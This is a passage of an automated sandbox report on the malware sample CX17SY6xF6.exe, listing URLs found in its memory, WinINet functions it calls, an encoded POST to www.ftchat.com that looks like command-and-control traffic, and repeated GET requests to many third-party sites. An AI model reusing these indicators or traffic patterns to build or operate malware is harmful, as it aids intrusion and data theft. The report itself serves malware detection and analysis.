00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/xmlrpc.php?rsd
                  Source: CX17SY6xF6.exe, 00000000.00000002.888204578.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.720829263.0000000007560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.888204578.0000000007222000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pwd.org/
                  Source: CX17SY6xF6.exe, 00000000.00000003.581132870.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.579192440.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.quadlock.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.sbc.si/o-sbc/organizacija
                  Source: CX17SY6xF6.exe, 00000000.00000003.681114888.0000000007217000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.683017666.0000000007186000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.648512272.00000000071FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.spanesi.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.stajerskagz.si/o-sgz-2/
                  Source: CX17SY6xF6.exe, 00000000.00000003.648512272.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.stajum.com/
                  Source: CX17SY6xF6.exe, 00000000.00000002.888204578.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stnic.co.uk/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.tecos.si/index.php/sl/o-podjetju/predstavitev
                  Source: CX17SY6xF6.exe, 00000000.00000003.584862853.00000000071A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tvtools.fi/
                  Source: CX17SY6xF6.exe, 00000000.00000002.888204578.0000000007222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.yoruksut.com.tr
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zdruzenje-manager.si/sl/o-zdruzenju/o-zdruzenju/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zds.si/sl/o-zds/predstavitev/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 7a 73 71 7a 45 37 30 78 67 38 70 70 77 62 64 5a 64 4d 64 65 70 76 62 6f 49 2f 72 72 49 2f 38 78 51 61 35 2f 36 4a 59 49 67 52 65 45 48 76 7a 45 74 68 72 71 32 4a 2f 6e 53 65 35 2f 55 54 4c 64 48 71 35 57 57 6a 4b 54 4d 32 4b 6d 32 42 39 65 4d 73 55 32 68 5a 62 64 46 72 48 33 35 57 65 34 2b 42 4d 35 71 6b 6c 53 35 4e 41 6a 51 59 42 47 31 61 6c 62 72 67 43 48 32 64 49 32 65 48 64 6a 43 6e 36 79 47 38 5a 34 78 56 61 48 77 52 61 41 64 6d 4b 2b 37 55 4c 4b 35 49 76 5a 32 54 70 77 74 33 4c 4f 35 6b 4e 35 38 46 48 30 65 35 52 68 6c 57 35 31 34 30 41 38 34 77 7a 6c 52 70 38 77 57 57 4f 71 47 75 30 52 5a 6e 36 71 4a 2b 49 68 52 65 38 76 77 39 36 32 52 50 41 6e 4c 39 58 74 31 43 77 55 35 4c 58 35 4d 76 78 78 38 4b 51 46 32 45 6a 6e 57 58 6e 65 6a 4d 58 48 4f 39 68 6f 57 48 58 64 68 61 58 4f 39 2f 46 61 2b 6f 52 46 53 4b 61 67 6f 6d 71 73 72 50 47 37 57 7a 6d 68 68 30 4e 6a 64 35 4c 62 64 75 43 57 65 55 49 36 32 45 4d 50 77 31 50 77 38 44 36 73 4d 38 6f 5a 4e 64 65 64 50 73 4d 36 41 5a 6b 79 4b 41 65 74 70 7a 39 6d 59 32 64 47 4d 44 56 72 2b 61 6a 66 34 51 57 71 75 43 58 50 78 50 31 2b 65 2b 47 75 4c 71 4c 51 6a 72 7a 32 44 57 38 4a 50 4d 53 51 70 30 71 65 46 55 4d 72 72 6f 4e 4a 56 2f 73 51 31 63 76 5a 4d 34 4b 44 78 2b 4d 63 39 35 5a 46 6e 4e 54 36 75 39 6b 77 71 45 6e 31 30 6b 62 71 65 54 2f 51 4a 34 46 4e 56 58 38 55 31 46 51 79 68 4e 70 6b 2f 41 70 6a 69 50 42 56 4a 2f 71 68 37 33 56 38 63 69 6f 69 53 66 63 61 50 59 6a 68 5a 64 30 68 4b 45 78 59 39 62 52 6e 5a 67 2b 50 65 56 30 35 44 79 45 76 57 33 73 31 79 52 41 79 49 76 4c 4e 77 6b 71 63 52 56 53 32 58 55 71 72 4a 34 39 7a 55 47 78 71 38 75 31 38 69 6e 67 4b 7a 33 65 64 65 72 4f 77 54 6c 56 59 46 47 73 3d Data Ascii: zsqzE70xg8ppwbdZdMdepvboI/rrI/8xQa5/6JYIgReEHvzEthrq2J/nSe5/UTLdHq5WWjKTM2Km2B9eMsU2hZbdFrH35We4+BM5qklS5NAjQYBG1albrgCH2dI2eHdjCn6yG8Z4xVaHwRaAdmK+7ULK5IvZ2Tpwt3LO5kN58FH0e5RhlW5140A84wzlRp8wWWOqGu0RZn6qJ+IhRe8vw962RPAnL9Xt1CwU5LX5Mvxx8KQF2EjnWXnejMXHO9hoWHXdhaXO9/Fa+oRFSKagomqsrPG7Wzmhh0Njd5LbduCWeUI62EMPw1Pw8D6sM8oZNdedPsM6AZkyKAetpz9mY2dGMDVr+ajf4QWquCXPxP1+e+GuLqLQjrz2DW8JPMSQp0qeFUMrroNJV/sQ1cvZM4KDx+Mc95ZFnNT6u9kwqEn10kbqeT/QJ4FNVX8U1FQyhNpk/ApjiPBVJ/qh73V8cioiSfcaPYjhZd0hKExY9bRnZg+PeV05DyEvW3s1yRAyIvLNwkqcRVS2XUqrJ49zUGxq8u18ingKz3ederOwTlVYFGs=
                  Source: unknownDNS traffic detected: queries for: www.fnw.us
                  Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00EC1840 InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,wnsprintfA,HttpAddRequestHeadersA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,HttpQueryInfoA,VirtualAlloc,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_00EC1840
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
